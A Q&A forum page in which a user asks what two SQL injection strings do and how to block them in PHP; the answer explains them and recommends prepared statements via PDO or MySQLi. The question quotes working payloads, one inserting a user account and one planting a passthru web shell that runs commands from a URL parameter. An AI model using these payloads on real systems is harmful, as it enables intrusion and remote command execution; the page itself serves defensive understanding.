Home/ Questions/Q 7799575
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-02T00:21:21+00:00

1. ‘ union select 1, ‘users (user, password) values (\’haxor\’, \’1337\’) #’, 2 #

  • 0
 1. 

    ' union select 1, 'users (user, password) values (\'haxor\',
            \'1337\') #', 2 #

 2. 

    ' union select 1, 'modules (plugin) values (\'if
       (isset($_GET[\\\'cmd\\\'])) {passthru($_GET[\\\'cmd\\\']);}\') #', 2
       #
  • what those code snippets do?
  • how can I prevent them in my php file?
  • what is 1337? and why there are a lot of \ ?
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    what those codes do?

    Well this kinda depends on the situation, but from the looks of it, the first code is an attempt to bypass a login system. The second one will allow hackers to execute a command on the server and display the output directly back to the browser.

    Documentation for PHP’s passthru(): http://php.net/manual/en/function.passthru.php

    how can I prevent them in my php file?

    There are many ways to prevent SQL injection. The most recommended one is to use the PDO library or MySQLi and take advatange of prepared statement.

    what is 1337? and why there are a lot of \ ?

    Taken from Urban Dictionary (Source: http://www.urbandictionary.com/define.php?term=1337)

    Hacker “Sp33k” for leet, or elite. Originating from 31337 “eleet”, the UDP port used by Dead Cow Cult, a hacker group, to access Windows 95 using Back Orifice, a notorious hacking program.

    The backslashes are used to escape special characters. Look at this WikiPedia article for more detail:
    http://en.wikipedia.org/wiki/Escape_character

    • 0